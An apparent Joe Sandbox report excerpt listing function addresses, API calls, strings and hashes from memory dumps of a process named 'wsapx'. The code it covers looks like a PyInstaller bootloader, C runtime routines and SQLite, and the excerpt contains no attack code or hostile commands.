Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 7d25f7ac8a3c166c1bdede6ca0dbec049a34941688e647fd4765907fde19d170
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 3C218C61A0864287E610BF10F4552EAA261EFC8BA0FC44032EE4D43786DF3CD90687A0

Function 00007FF7C71CB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB347
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB37D
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3CC
SetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3E7

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: 84e7e0a9fadca4a6f36f01f422b65ca118ae486240f7ff63dd1cf62948d89dfb
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: 54115C21B0C64283FA657FA1769513DE1865FC4FB0FD45734E82E86BD6DE2CA5438322

Function 00007FF7C71B2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E

Strings

Error [ANSI Fallback], xrefs: 00007FF7C71B29FF
Error, xrefs: 00007FF7C71B2A0E
[PYI-%d:ERROR] , xrefs: 00007FF7C71B2966
%s: %s, xrefs: 00007FF7C71B29E8

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 0e6d034a4e7fc8c4bebf70231812136ac6f2f6419f14b6921b6d034f5fc074f6
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 7B31C462B1868153E720BF61B8416E6A694BFC8BF4F804132EE8D83759EF3CD54B8610

Function 00007FF7C71B2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7C71B23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF7C71B248E
DeleteObject.GDI32 ref: 00007FF7C71B24C1
DestroyIcon.USER32 ref: 00007FF7C71B24D3

Strings

Unhandled exception in script, xrefs: 00007FF7C71B23F8

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
Instruction ID: fe9599cde958b9244c90cfe3cf0b1c5f1ac0c296915bac6f656c3aca88e967af
Opcode Fuzzy Hash: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
Instruction Fuzzy Hash: 2F312F726196818AEB20EF61F8552F9A360FFC8BA4F844135EE4E47B59DF3CD1068710

Function 00007FF7C71B2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7C71B918F,?,00007FF7C71B3C55), ref: 00007FF7C71B2BA0
MessageBoxW.USER32 ref: 00007FF7C71B2C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF7C71B2BA8
Warning, xrefs: 00007FF7C71B2C1D
WARNING, xrefs: 00007FF7C71B2BAF

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 817611a5d3294286b8bd5edb3c49afabb3c5bfebe8999a8e7b000bb8bffb938e
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: E921B172718B4183E721AF54F4847AAA3A4EB88BD4F804131EE8D53659DF3CD206C750

Function 00007FF7C71B2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7C71B1B99), ref: 00007FF7C71B2760

Strings

Error [ANSI Fallback], xrefs: 00007FF7C71B27CF
[PYI-%d:%s] , xrefs: 00007FF7C71B2768
Error, xrefs: 00007FF7C71B27DE
ERROR, xrefs: 00007FF7C71B276F

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 64d08f87e1268a892e2fd38ffa748b565af9ca2ae3d8a0c340e32ee224ec91d1
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: FF218372A19B8183E621EF51B4817E6A394FBC8BE4F800135EE8D43759DF3CD6468750

Function 00007FF7C71C9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7C71C9B1D
GetProcAddress.KERNEL32 ref: 00007FF7C71C9B33
FreeLibrary.KERNEL32 ref: 00007FF7C71C9B5A

Strings

mscoree.dll, xrefs: 00007FF7C71C9B14
CorExitProcess, xrefs: 00007FF7C71C9B2C

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 7d48d5ec2930485cf425f8dd2f30bdf2d43a517a67006d89db4082c16d051a11
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 0DF0AF21A08B0693EA20AF60B498B799320AFC9B71F840235CA6F461E4CF2CD246C720

Function 00007FF7C71D93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7C71D9400
_set_statfp.LIBCMT ref: 00007FF7C71D941B
_set_statfp.LIBCMT ref: 00007FF7C71D9437
_set_statfp.LIBCMT ref: 00007FF7C71D9473

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: b99009e7075c00af2b9655543ceb189c9fd05b428b6562c3fe5f9e1b9021c045
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: D811B672D0CA1343F6563914F6DA3759844EFF8B74E850634EA6E062D7CF2C69438960

Function 00007FF7C71CB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB41F
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB43E
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB466
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB477
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB488

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: b9b6ea16b84fcbe13025ca2c23c611670384b90b0d97639ecc483b1a946ed828
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: AE113D21B0D64243FA68BFA5755617DE18A5FC4FB0FC48334E93E8A6D6DE2CA5438221

Function 00007FF7C71CB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7C71CB2A5
FlsSetValue.KERNEL32 ref: 00007FF7C71CB2C4
FlsSetValue.KERNEL32 ref: 00007FF7C71CB2EC
FlsSetValue.KERNEL32 ref: 00007FF7C71CB2FD
FlsSetValue.KERNEL32 ref: 00007FF7C71CB30E

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: 16145053c0ed3a18468c6fd78810d73d1cd33425ca6b9729971fed79934a4a0a
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: 32111520F0920783FA687FA5785627E918A5FC5F70FD85734D93E8A6C2DD2CB5438222

Function 00007FFD947A3430 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD947A357B

Strings

unknown column "%s" in foreign key definition, xrefs: 00007FFD947A37CC
foreign key on %s should reference only one column of table %T, xrefs: 00007FFD947A34B5
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFD947A34DE

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3344901894-272990098
Opcode ID: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
Instruction ID: 8d94dc4b2e9d14a4aad24c8563c40f3123fa564f7ea97f66ec14d151e017a0f3
Opcode Fuzzy Hash: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
Instruction Fuzzy Hash: 35D1EF62B0AB89C2EA748F9590E46B977A1FB46B84F548131DE5D07786DF3CE441C390

Function 00007FFD94795F30 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 302COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9479605F
00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD94796112

Strings

"%w" , xrefs: 00007FFD94795FE0
%Q%s, xrefs: 00007FFD94796284

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: "%w" $%Q%s
API String ID: 3344901894-1987291987
Opcode ID: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
Instruction ID: 2ef50576dceae34dab70c923c2407e9510804c0b0ab70323fc951a71c346c6d9
Opcode Fuzzy Hash: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
Instruction Fuzzy Hash: 2AC19F32B08A85C6EA28CF95A4E067977A1FB86BE0F448635DA6D077D6DF3CE441C740

Function 00007FFD94763D20 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 260COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD94763ECE

Strings

%s at line %d of [%.10s], xrefs: 00007FFD94763D7D
database corruption, xrefs: 00007FFD94763D71
831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FFD94763D65

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3344901894-3764764234
Opcode ID: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
Instruction ID: 00a5ecbb0b988e32b6815dde27041a568d8204fce0e1239c23a32ab95ec49e73
Opcode Fuzzy Hash: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
Instruction Fuzzy Hash: CDB1F032B0869AC6D770CBA5A0A4BBA77A6FB49B90F018135DE4D47B87DF39D440C781

Function 00007FFD9475F7C0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 254COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 00007FFD9475F856
database corruption, xrefs: 00007FFD9475F84A
831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FFD9475F83E

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 0-3764764234
Opcode ID: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
Instruction ID: 62e804e13b8af2932ed9722c3107ae6b3184504a4369d808bbf39ef858a84111
Opcode Fuzzy Hash: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
Instruction Fuzzy Hash: A0A14772B0C3D5CAD7748BA894A46BD7B91FB82740F44C935DB8A8B682DE3CE146C740

Function 00007FF7C71C6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C622C

Strings

verbose, xrefs: 00007FF7C71C6020

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 922d11b8d62e10db57ae46b8a43be90811dd9f96d16df67f441aa31be4d89574
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 5991D132A08A4682F761AEA5E45077DB7A1ABC0FA4FC44136DA5E433C5DF3CE4078322

Function 00007FFD9475FCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9475FEF9

Strings

%s at line %d of [%.10s], xrefs: 00007FFD9475FD9F, 00007FFD9475FF36
database corruption, xrefs: 00007FFD9475FD93, 00007FFD9475FF2A
831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FFD9475FD87, 00007FFD9475FF1D

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 3344901894-3764764234
Opcode ID: 8a81c8cbb4aa2b9f2a700104a6053669787526fe1ac8cdbb7c926e4a602ee9f8
